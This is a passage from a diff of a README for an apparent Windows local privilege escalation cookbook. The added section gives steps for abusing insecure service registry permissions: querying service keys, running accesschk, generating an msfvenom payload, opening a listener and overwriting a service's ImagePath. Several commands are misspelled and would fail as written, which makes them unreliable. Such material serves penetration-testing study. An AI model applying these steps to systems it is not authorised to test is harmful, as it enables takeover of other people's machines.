nickvourd/Windows-Local-Privilege-Escalation-Cookbook/README.md

    * net start SERVICENAME

 * Stop and start the service again and you’re a Local Admin!

+# Insecure Registry Permissions
+Windows stores all the necessary data that is related to services in the registry key location below:

+* req query HKLM\SYSTEM\CurrentControlSet\Services
+  * If you find a vulnerable service use the follwing command to see its details:
+    * req query HKLM\SYSTEM\CurrentControlSet\Services\<servicename>

+ * Find from which group is accessible this service
+    * accesschk.exe –kvusw hklm\System\CurrentControleSet\Service

+ * generate a payload:
+   * msfvenom –p windows/exec CMD=<Command> -f exe-services –o <service binery>

+ * open a listener

+ * Overweight the imagepath subkey of the valuable services with the path of the custom binary
+   * reg add HKLM\System\CurrentControleSet\Service\<Service nam> /v ImagePath /t REG_EXPAND_SZ /d <path_to_exe> /f

 # Token Manipulation
 * whoami /priv